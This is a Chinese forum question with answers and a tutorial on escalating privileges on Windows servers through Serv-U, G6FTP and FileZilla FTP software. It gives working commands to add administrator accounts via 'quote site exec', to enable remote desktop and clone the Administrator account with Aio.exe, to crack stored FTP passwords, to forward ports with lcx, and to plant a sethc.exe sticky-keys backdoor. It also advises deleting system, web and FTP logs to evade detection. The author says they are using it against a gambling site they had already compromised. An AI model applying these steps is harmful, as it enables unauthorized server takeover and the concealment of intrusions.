ftp提权的问题

Posted 2023-03-21

现在从一些网络视频上可以看到一些人用cmd来提权就是有一点儿不懂,,有没有那位大虾.帮助一下
open Ip得到结果.要输入用户名我看到很多人用X1911I 不知道这个
X1911是不是通用用户名..后面输入的密码又是什么.有那位可以帮帮忙...非常感谢

参考技术A 开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 （小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下）
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令：
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add

windows提权之ftp提权

windows提权之ftp提权

0，起因，由于前几天拿了一个菠菜站的webshell，但是只有iis权限，执行无法创建用户等操作，更无法对整个服务器进行控制了，于是此时便需要提权了，对于一个刚刚入门的小白来说，此刻真正意识到了提权的重要性，于是便开始学习提取相关知识，以拿下该菠菜的站点。

提权前的准备工作

1，通常来说，不同的脚本所处的权限是不一样的。这就意味着，如果该站点支持权限更高的脚本，我们可以上传该权限更高的脚本的大马，进而拿到更高的权限。

• asp/php 通常为匿名权限(网络服务权限)
• aspx 通常为user权限
• jsp 通常为系统权限

2，提权中常常也需要进行信息收集：

• 内外网
• 服务器系统和版本位数
• 服务器的补丁情况
• 服务器的安装软件情况
• 服务器的防护软件情况
• 端口情况
• 所支持的脚本情况
• ...............................等等

3，windows信息收集中常用的命令：

ipconfig /all    查看当前ip
net user         查看当前服务器账号情况
netstat -ano     查看当前服务器端口开放情况
ver              查看当前服务器操作系统
systeminfo       查看当前服务器配置信息（补丁情况）
tasklist /svc    查看当前服务器进程情况
taskkill -pid pid号  结束某个pid号的进程
taskkill /im qq.exe /f 结束qq进程，如果对命令不清楚，可以使用taskkill /? 进行查看
net user v01cano v01cano /add 添加一个用户名为v01cano密码为v01cano的用户
net localgroup administrators v01cano /add 将用户v01cano添加到管理员组
whoami                   查看当前操作用户（当前权限） 

4，FTP软件提权：

常见的FTP软件有server-u，g6ftp，filezilla。

server-u提权

• Server -u的默认端口为43958

server-u提权常用方法,一：

1，查看默认安装目录下的ServUDaemon.ini文件，进而查看用户名和密码，将密码去cmd5.com找到对应的server-u的解密方式进行解密。

2，登入ftp，执行如下命令，创建用户，并且加入到管理员组。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add

server-u提权常用方法二：

1，使用大马直接创建ftp账号，使用ftp账号登入ftp。

2，然后再执行如下命令，创建系统账号。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add

server-u提权常用方法三：

server-u的管理员账号权限较大，相当于系统权限，可以通过管理员账号直接创建用户，并且加入到管理员组。

g6ftp提权：

科普：g6ftp的默认端口为8021，只侦听在127.0.0.1的8021端口上，所以无法从外部直接访问，需要进行端口转发。

1，查找管理配置文件Remote.ini，将administrator管理密码解密。解密得到administrator的管理员密码为123456

2，首先进行查找该网站的可读可写目录，然后上传cmd.exe和lcx.exe到该目录下。

3，查看网站根目录的权限得知，此处网站的根目录可读可写，直接上传到网站跟目录即可。上传成功后，即可直接通过cmd.exe调用lcx.exe命令，查看lcx.exe的用法。

然后通过如下命令转发端口，将127.0.0.1的8021端口通过8427端口转发出去：

4，转发成功后，通过g6ftp软件进行连接，以管理员用户登入

连接成功：

5，创建用户并设置权限和执行批处理文件

创建用户：右键，选择new user

选择根目录为c盘：

赋予全部权限：

然后将批处理文件adduser.bat上传到目标站点中：
adduser.bat中的文件内容为：即新建一个用户名和密码均为v01cano的用户，并且加入到管理员组中。

net user v01cano v01cano /add
net localgroup administrators v01cano /add

然后在g6ftp软件中加入批处理命令：

然后在控制台登录ftp，并且执行所加入的批处理命令：命令成功执行：

在目标机上查看，新建用户成功，并且成功加入到了管理员组。

提权成功。

filezilla提权：

科普：filezilla默认端口为14147端口

1，找到默认安装目录下面有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)，查看用户名和密码：

2，进行端口转发，方法类似g6ftp:

3，使用filezilla软件进行远程连接：

4，新建用户并设置用户的根目录。

5，打开filezilla客户端软件，使用刚刚新建的用户名和密码进行连接：

6，连接成功以后，替换c:/windows/system32/sethc.exe文件。

7，直接远程连接即可，win+r输入mstsc即可打开远程桌面。输入靶机ip进行连接：不需要输入用户名和密码，直接连续按下5次shift键，即可以管理员的身份打开cmd，然后创建用户，或者直接输入explorer.exe，进入靶机。远控成功。